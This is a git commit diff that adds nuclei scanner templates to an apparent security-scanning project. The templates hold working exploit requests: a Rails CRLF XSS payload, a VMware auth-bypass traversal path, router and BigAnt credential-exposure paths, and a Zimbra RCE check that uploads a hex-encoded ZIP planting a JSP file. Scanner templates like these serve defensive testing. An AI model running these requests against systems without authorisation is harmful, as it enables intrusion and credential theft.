up nuclei to latest 2022-08-17

Author: hktalent

.github/up.sh

@@ -16,7 +16,6 @@ cat ./go.mod|grep projectdiscovery|grep -E "subfinder|nuclei|wappalyzergo"|awk '
 
 cp -rf $HOME/MyWork/xray/pocs/*.yml $HOME/MyWork/scan4all/pocs_yml/ymlFiles/
 ls ../nuclei-templates|xargs -I % cp -rf ../nuclei-templates/% config/nuclei-templates/
-config/nuclei-templates
 echo "start 静态go.mod去除不相关依赖"
 go mod tidy
 echo "更新 vendor "

config/nuclei-templates/51pwn/rails6-xss.yaml

@@ -0,0 +1,26 @@
+id: rails6-xss
+info:
+  name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2)
+  author:
+  - l0ne1y
+requests:
+- matchers:
+  - type: word
+    part: body
+    words:
+    - javascript:alert(1)
+  - type: status
+    status:
+    - 302
+  - type: word
+    condition: and
+    part: header
+    words:
+    - 'Location: javascript:alert(22)'
+    - text/html
+  matchers-condition: and
+  redirects: false
+  path:
+  - '{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0ajavascript:alert(22)'
+  method: POST
+

config/nuclei-templates/cves/2022/CVE-2022-23348.yaml

@@ -0,0 +1,45 @@
+id: CVE-2022-23348
+
+info:
+  name: BigAnt Server v5.6.06 - Improper Access control
+  author: arafatansari
+  severity: medium
+  description: |
+    BigAnt Server v5.6.06 suffers from Use of Password Hash With Insufficient Computational Effort.
+  reference:
+    - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-23348
+    - http://bigant.com
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2022-23348
+    cwe-id: CWE-916
+  metadata:
+    shodan-query: http.html:"bigant"
+    verified: "true"
+  tags: cve,cve2022,bigant,unauth,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Runtime/Data/ms_admin.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"user_name";'
+          - '"user_pwd";'
+          - '"user_id";'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-31656.yaml

@@ -0,0 +1,45 @@
+id: CVE-2022-31656
+
+info:
+  name: VMware - Authentication Bypass
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
+  reference:
+    - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
+    - https://www.vmware.com/security/advisories/VMSA-2022-0021.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31656
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-31656
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.favicon.hash:-1250474341
+    verified: "true"
+  tags: cve,cve2022,vmware,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<web-app"
+          - "<servlet-name>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-31845.yaml

@@ -0,0 +1,41 @@
+id: CVE-2022-31845
+
+info:
+  name: WAVLINK WN535 G3 - Information Disclosure
+  author: arafatansari
+  severity: high
+  description: |
+    A vulnerability in live_check.shtml of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to obtain sensitive router information via execution of the exec cmd function.
+  reference:
+    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31845
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-31845
+    cwe-id: CWE-668
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2022,wavlink,exposure
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        GET /live_check.shtml HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Model='
+          - 'FW_Version='
+          - 'LanIP='
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-31847.yaml

@@ -0,0 +1,39 @@
+id: CVE-2022-31847
+
+info:
+  name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
+  author: arafatansari
+  severity: high
+  description: |
+    A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.
+  reference:
+    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31847
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-31847
+    cwe-id: CWE-668
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2022,wavlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Login='
+          - 'Password='
+          - 'Model='
+          - 'AuthMode='
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-37042.yaml

@@ -0,0 +1,46 @@
+id: CVE-2022-37042
+
+info:
+  name: Zimbra Collaboration Suite - Unauthenticated RCE
+  author: _0xf4n9x_,For3stCo1d
+  severity: critical
+  description: |
+    Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. This issue exists because of an incomplete fix for CVE-2022-27925.
+  reference:
+    - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-37042
+    - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/
+    - https://github.com/vnhacker1337/CVE-2022-27925-PoC
+  metadata:
+    fofa-query: app="zimbra-邮件系统"
+    shodan-query: http.favicon.hash:"1624375939"
+  tags: cve,cve2022,zimbra,rce,unauth,kev
+
+requests:
+  - raw:
+      - |
+        POST {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        content-type: application/x-www-form-urlencoded
+
+        {{hex_decode("504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000")}}
+
+      - |
+        GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path:
+        - /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1
+        - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd
+
+    stop-at-first-match: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 401'
+          - 'status_code_2 == 200'
+          - "contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"
+        condition: and

config/nuclei-templates/exposed-panels/nagios-panel.yaml

@@ -0,0 +1,28 @@
+id: nagios-panel
+
+info:
+  name: Nagios Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"nagios"
+  tags: panel,nagios
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/nagios"
+      - "{{BaseURL}}/nagios3"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Nagios Access'
+
+      - type: status
+        status:
+          - 401

config/nuclei-templates/exposed-panels/nagios-xi-panel.yaml

@@ -0,0 +1,32 @@
+id: nagios-xi-panel
+
+info:
+  name: Nagios XI Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"Nagios XI"
+  tags: panel,nagios,nagios-xi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/nagiosxi/login.php"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'alt="Nagios XI'
+          - '/nagiosxi/includes'
+        condition: or
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/ocs-inventory-login.yaml

@@ -2,25 +2,29 @@ id: ocs-inventory-login
 
 info:
   name: OCS Inventory Login Panel
-  author: pikpikcu
+  author: pikpikcu,ritikchaddha
   severity: info
   metadata:
+    verified: true
+    shodan-query: title:"OCS Inventory"
     fofa-query: title="OCS Inventory"
   tags: ocs-inventory,panel
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}"
+      - "{{BaseURL}}/ocsreports"
 
+    stop-at-first-match: true
     redirects: true
     max-redirects: 2
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '<title>OCS Inventory</title>'
+          - '<title>OCS Inventory'
 
       - type: status
         status:

config/nuclei-templates/exposures/configs/behat-config.yaml

@@ -0,0 +1,32 @@
+id: behat-config
+
+info:
+  name: Behat Configuration File Exposure
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"behat.yml"
+  reference: https://docs.behat.org/en/v2.5/guides/7.config.html
+  tags: exposure,behat,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/behat.yml"
+      - "{{BaseURL}}/behat.yml.dist"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'default:'
+          - 'paths:'
+          - 'suites:'
+        condition: and
+
+      - type: status
+        status:
+          - 200